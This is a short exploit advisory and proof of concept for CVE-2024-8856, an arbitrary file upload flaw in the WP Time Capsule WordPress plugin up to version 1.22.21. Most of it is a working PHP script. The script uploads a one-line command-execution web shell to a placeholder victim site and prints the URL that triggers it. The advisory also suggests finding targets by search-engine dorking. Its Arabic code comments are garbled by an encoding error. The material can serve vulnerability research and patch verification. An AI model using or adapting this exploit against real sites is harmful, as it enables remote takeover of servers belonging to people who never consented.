=============================================================================================================================================
| # Title     : WP Time Capsule 1.22.21 PHP Shell Upload vulnerability                                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://fr.wordpress.org/plugins/wp-time-capsule/                                                                           |
=============================================================================================================================================

POC :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] Code Description: exploits an arbitrary file upload vulnerability in WordPress WP Time Capsule plugin versions less than or equal to 1.22.21. 

    (Related : https://packetstorm.news/files/id/183146/ Related CVE numbers:	CVE-2024-8856 ) .
	
[+] Payload : 

[+] Set Target : line 17

[+] Usage : php poc.php 

[+] PayLoad :

<?php
// Ø§Ø³ØªÙ‡Ø¯Ø§Ù Ù…Ø³Ø§Ø± Ø§Ù„ØªØÙ…ÙŠÙ„ ÙÙŠ Ø§Ù„Ø¥Ø¶Ø§ÙØ©
$target = "http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php";
$payload_name = rand(10,99) . ".php"; // Ø§Ø³Ù… Ø¹Ø´ÙˆØ§Ø¦ÙŠ Ù„Ù„Ù…Ù„Ù
$payload_content = "<?php system(\$_GET['cmd']); ?>"; // ØÙ…ÙˆÙ„Ø© ØªÙ†ÙÙŠØ° Ø£ÙˆØ§Ù…Ø±

// Ø¥Ù†Ø´Ø§Ø¡ Ø·Ù„Ø¨ Ù…Ù„Ù Ø¨ØµÙŠØºØ© Multipart
$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";
$data = "--" . $boundary . $eol;
$data .= 'Content-Disposition: form-data; name="files"; filename="' . $payload_name . '"' . $eol;
$data .= "Content-Type: application/x-php" . $eol . $eol;
$data .= $payload_content . $eol;
$data .= "--" . $boundary . "--" . $eol;

// ØªÙ†ÙÙŠØ° Ø§Ù„Ø·Ù„Ø¨
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: multipart/form-data; boundary=" . $boundary));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// Ø·Ø¨Ø§Ø¹Ø© Ø§Ù„Ù†ØªÙŠØ¬Ø©
if (strpos($response, $payload_name) !== false) {
    echo "[+] ØªÙ… Ø±ÙØ¹ Ø§Ù„ØÙ…ÙˆÙ„Ø© Ø¨Ù†Ø¬Ø§Ø: " . $payload_name . "\n";
    echo "[+] Ø±Ø§Ø¨Ø· Ø§Ù„ØªÙ†ÙÙŠØ°: http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/$payload_name?cmd=whoami\n";
} else {
    echo "[-] ÙØ´Ù„ ÙÙŠ Ø±ÙØ¹ Ø§Ù„ØÙ…ÙˆÙ„Ø©.\n";
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================